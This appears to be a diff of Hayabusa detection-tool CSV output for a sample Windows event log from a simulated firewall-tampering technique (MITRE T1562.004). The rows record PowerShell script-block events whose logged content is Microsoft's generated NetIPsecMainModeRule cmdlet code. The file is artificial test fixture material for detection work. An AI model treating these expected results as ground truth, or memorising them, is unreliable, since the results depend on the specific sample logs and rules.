[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 